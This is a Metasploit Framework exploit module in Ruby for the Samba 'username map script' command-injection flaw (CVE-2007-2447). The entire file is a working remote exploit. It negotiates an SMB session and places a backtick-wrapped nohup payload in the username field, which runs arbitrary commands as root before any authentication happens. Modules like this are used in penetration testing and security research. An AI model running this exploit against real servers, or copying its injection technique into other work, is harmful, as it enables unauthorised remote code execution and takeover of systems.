metasploit-framework/modules/exploits/multi/samba/usermap_script.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SMB

	# For our customized version of session_setup_ntlmv1
	CONST = Rex::Proto::SMB::Constants
	CRYPT = Rex::Proto::SMB::Crypt

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba "username map script" Command Execution',
			'Description'    => %q{
					This module exploits a command execution vulerability in Samba
				versions 3.0.20 through 3.0.25rc3 when using the non-default
				"username map script" configuration option. By specifying a username
				containing shell meta characters, attackers can execute arbitrary
				commands.

				No authentication is needed to exploit this vulnerability since
				this option is used to map usernames prior to authentication!
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2007-2447' ],
					[ 'OSVDB', '34700' ],
					[ 'BID', '23972' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
					[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => true, # root or nobody user
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							# *_perl and *_ruby work if they are installed
							# mileage may vary from system to system..
						}
				},
			'Targets'        =>
				[
					[ "Automatic", { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 14 2007'))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end


	# Authenticate using NTLMv1
	def session_setup_ntlmv1(user = '', pass = '', domain = '')

		raise XCEPT::NTLM1MissingChallenge if not self.simple.client.challenge_key

		if (pass.length == 65)
			hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.simple.client.challenge_key)
			hash_nt = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.simple.client.challenge_key)
		else
			hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.simple.client.challenge_key) : ''
			hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.simple.client.challenge_key)   : ''
		end

		data = ''
		data << hash_lm
		data << hash_nt
		data << user + "\x00"
		data << domain + "\x00"
		data << self.simple.client.native_os + "\x00"
		data << self.simple.client.native_lm + "\x00"

		pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
		self.simple.client.smb_defaults(pkt['Payload']['SMB'])

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0x2001
		pkt['Payload']['SMB'].v['WordCount'] = 13
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['MaxBuff'] = 0xffdf
		pkt['Payload'].v['MaxMPX'] = 2
		pkt['Payload'].v['VCNum'] = 1
		pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
		pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
		pkt['Payload'].v['Capabilities'] = 64
		pkt['Payload'].v['SessionKey'] = self.simple.client.session_id
		pkt['Payload'].v['Payload'] = data

		self.simple.client.smb_send(pkt.to_s)

		# We don't care how the server responds, we should have a session already :)
		# And such is our leet customization.
	end


	def exploit

		connect

		# lol?
		username = "/=`nohup " + payload.encoded + "`"
		begin
			simple.client.negotiate(false)
			session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'])
		rescue ::Timeout::Error, XCEPT::LoginError
			# nothing
		end

		handler
	end

end